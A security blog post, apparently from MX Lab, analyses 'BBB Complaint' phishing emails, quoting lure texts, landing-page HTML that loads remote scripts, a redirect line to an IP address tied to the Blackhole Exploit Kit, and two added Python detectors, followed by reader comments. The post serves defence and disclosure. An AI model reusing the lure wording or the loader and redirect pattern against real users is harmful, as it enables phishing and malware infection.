Emails “BBB Complaint activity report” is an email security risk


MX Lab, http://www.mxlab.eu, started to intercept a new email-based security risk with subjects like:

BBB Complaint activity report
BBB Case #9782213

The email is sent from “Better Business Bureau” with a spoofed email address in the form of DD3A0C27@domain.tld (random numbers and capital letters) and has the following body:

Dear business owner, we have received a complaint about your company possible involvement in check cashing and Money Order Scam.

You are asked to provide response to this complaint within 7 days.

Failure to provide the necessary information will result in downgrading your Better Business Bureau rating and possible cancellation of your BBB accreditation status.

Complaint ID#793354020

Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277

A second version is sent from the spoofed email address “customer_reviews@boston.bbb.org” and with the subject “BBB – Read Your Customer Review”:

One of your customers has submitted a review of your company.

The Customer Review has NOT yet been posted in your BBB Business Review.

You can read the Customer Review and at your option provide a comment by logging into your BBB account.

Please login and use the link below.

http://www.bbb.org/boston/login/504/

Your BBB ID: 84167
Your emails is: rosara@famous.be

All Customer Reviews are posted after one full business day.

Note:You can login to your BBB account and submit a comment to any Customer Review at any time.

Thank you.

Questions?
BBB
290 Donald Lynch Boulevard, Suite 102
Marlborough, MA 01752-4705
508-652-4800
customer_reviews@boston.bbb.org

Email ID: bcebfb9b
To confirm this email please login it at http://www.bbb.org/boston/login.

This mailing was sent to ****@*****.be.

This message is being sent to you by Better Business Bureau Serving Eastern Massachusetts, Maine, Rhode Island and Vermont.
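
A mail-filter heuristic for the two sender patterns described above, added here as an example and not part of the original post. The flag names, the `dmarc=pass` check and the sample messages are assumptions made for illustration; the Authentication-Results header is only meaningful when it was written by your own receiving mail server.

```python
import re
from email import message_from_string
from email.utils import parseaddr

BRAND_NAMES = ("better business bureau", "bbb")
BRAND_DOMAIN = "bbb.org"
# Eight capitals/digits with at least one of each, e.g. DD3A0C27 (heuristic).
RANDOM_LOCAL = re.compile(r"^(?=.*\d)(?=.*[A-Z])[0-9A-Z]{8}$")

# Constructed sample messages modelled on the two versions described above.
V1 = ('From: "Better Business Bureau" <DD3A0C27@domain.tld>\n'
      "Subject: BBB Complaint activity report\n\nbody\n")
V2 = ("Authentication-Results: mx.example.test; spf=fail; dmarc=fail\n"
      "From: customer_reviews@boston.bbb.org\n"
      "Subject: BBB - Read Your Customer Review\n\nbody\n")


def sender_flags(raw_message):
    """Return a sorted list of reasons the From header looks spoofed."""
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    local, _, domain = addr.rpartition("@")
    domain = domain.lower()
    flags = set()
    claims_brand = any(name in display.lower() for name in BRAND_NAMES)
    on_brand = domain == BRAND_DOMAIN or domain.endswith("." + BRAND_DOMAIN)
    # Version 1: brand in the display name, unrelated sending domain.
    if claims_brand and not on_brand:
        flags.add("display-name-domain-mismatch")
    if RANDOM_LOCAL.match(local):
        flags.add("random-local-part")
    # Version 2: the address itself is on the brand domain, so only the
    # receiving server's authentication verdict can expose the spoof.
    auth = " ".join(msg.get_all("Authentication-Results", []))
    if on_brand and not re.search(r"\bdmarc=pass\b", auth):
        flags.add("brand-domain-unauthenticated")
    return sorted(flags)
```
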

The malicious URL leads to a web page that loads a JavaScript file:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading…</h3>
 <script type="text/javascript" src="hxxp://www.studiodans.ro/33GP6BbG/js.js"></script>
</html>

Another example:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="hxxp://mabuhay63.com/q9Vgqgen/js.js"></script>
 <script type="text/javascript" src="hxxp://pst.org.br/Wi4aFSLZ/js.js"></script>
</html>

Again, this JavaScript contains the following code to open a document on another host:

document.location='hxxp://108.178.59.11/links/deep_recover-result.php';

We have found an analysis of the obfuscated JavaScript, and it appears that this is the Blackhole Exploit Kit (BHEK), perhaps version 2.0, in action. BHEK can exploit multiple vulnerabilities in the Java Runtime Environment (JRE), Flash and Adobe Reader.

You can find the original announcement regarding the Blackhole Exploit Kit (BHEK) v2 on pastebin or read the translated version.

Recommendation: when receiving such an email, put it in the trash or remove it from your system and, most importantly, do not click on any of the URLs in it.
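
For proxy or sandbox triage, the landing-page shape shown above (a "WAIT PLEASE" heading plus one or more scripts at `/<8 characters>/js.js`) and the `document.location` hop to a bare IP address can be matched statically. This is an added example, not code from MX Lab; the function names, the heuristics and the sample hosts are assumptions, and nothing is fetched.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
# Path shape shared by the loader URLs above: /<8 alphanumerics>/js.js
LOADER_PATH = re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")
REDIRECT = re.compile(r"document\.location\s*=\s*['\"]([^'\"]+)['\"]")
# Constructed samples: hosts and paths are made up, URLs stay defanged.
SAMPLE_PAGE = """<html><h1>WAIT PLEASE</h1><h3>Loading...</h3>
<script type="text/javascript" src="hxxp://site-a.example/Ab3dE6gH/js.js"></script>
<script type="text/javascript" src="hxxp://site-b.example/q1W2e3R4/js.js"></script>
</html>"""
SAMPLE_JS = "document.location='hxxp://192.0.2.10/links/page.php';"

class PageScan(HTMLParser):  # collects script src URLs and <h1>/<h3> text
    def __init__(self):
        super().__init__()
        self.scripts, self.headings, self._open = [], [], None

    def handle_starttag(self, tag, attrs):
        self._open = tag
        if tag == "script" and dict(attrs).get("src"):
            self.scripts.append(dict(attrs)["src"])

    def handle_endtag(self, tag):
        self._open = None

    def handle_data(self, data):
        if self._open in ("h1", "h3") and data.strip():
            self.headings.append(data.strip().upper())

def loader_hosts(html):
    """Hosts serving a loader-shaped script, reported only with the lure heading."""
    scan = PageScan()
    scan.feed(html)
    lure = any("WAIT" in h for h in scan.headings)
    hosts = {urlparse(s).hostname for s in scan.scripts if LOADER_PATH.match(urlparse(s).path)}
    return sorted(h for h in hosts if h) if lure else []

def redirect_to_ip(js):
    """Return the document.location target when its host is a bare IP address."""
    m = REDIRECT.search(js)
    if not m:
        return None
    try:
        ipaddress.ip_address(urlparse(m.group(1)).hostname or "")
    except ValueError:
        return None
    return m.group(1)
```

Several distinct hosts returned for one page is itself a useful signal: the second sample above pulls the same `js.js` loader from two unrelated sites.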

8 Responses to Emails “BBB Complaint activity report” is an email security risk

  1. lbsheehan says:

    Yep. I have received two this morning. I don’t open and put in spam folder.

  2. Email User says:

    Yup, same here, with following email:
    Better Business Bureau

  3. Frustrated says:

    Somebody is sending out these emails using our company domain as their email address. As a result we are getting dozens of emails bouncing back to our server every day. Any idea how to stop it??!!

    • Ryan says:

      Look into adding an SPF record to your domain name. It won’t stop anything right away but in the long term it’ll help.

  4. Ryan says:

    I’m receiving about 4 of these every minute. Luckily Google is catching 99% of them.

  5. Joe Jumper says:

    Wondering WHY is BBB or FBI not taking care of that “business”?

  6. mks says:

    Latest with attachment

    The details of the consumer’s concern are contained in enclosed document. Please give attention to this issue and inform us about your opinion as soon as possible.

    We kindly ask you to open the COMPLAINT REPORT (attached to this email) to reply on this complaint.
    We are looking forward to your prompt response.
    Faithfully yours,
    Jaclyn Simon
    Dispute Counselor
    Better Business Bureau

  7. cdp says:

    Looks like my known spam folder wound up with this one today. Saved the source info and promptly deleted the email. Funny thing is I don’t have any business for anyone to complain about, I don’t run one at all!!!

    The source info below:

    “Return-Path:
    Received: from xx-xxxxxx.xxx.xx.xxxxxxxx.xxx ([xxx.xx.xxx.xxx])
    by xxx-xxxxxxx.xxx.xx.xxxxxxxx.xxx (xxxxxxxx SMTP Server) with SMTP id xxxxxxxxxxxxxxxxxxxx; Fri, 30 Nov 2012 17:44:44 -0500 (EST)
    Received: from mail.maillance.com ([66.132.174.110])
    by xx-xxxxxx.xxx.xx.xxxxxxxx.xxx (xxxxxxxx SMTP Server) with xSMTP id xxxxxxxxxxxxxxxxxxxx; Fri, 30 Nov 2012 17:43:28 -0500 (EST)
    Received: from ([127.0.0.1]) with MailEnable xSMTP; Fri, 30 Nov 2012 17:28:13 -0500
    Message-ID:
    Date: Sat, 01 Dec 2012 02:16:07 +0400
    Reply-To: “Better Business Bureau”
    From: “Better Business Bureau” ”

    [followed by a string of quite a lot of email addresses]

    “Subject: Please review your customer’s complaint
    Content-Type: multipart/mixed;
    boundary=”————735385810242715076207212″ ”

    [Crossed out all the other stuff, but the important info is still there]
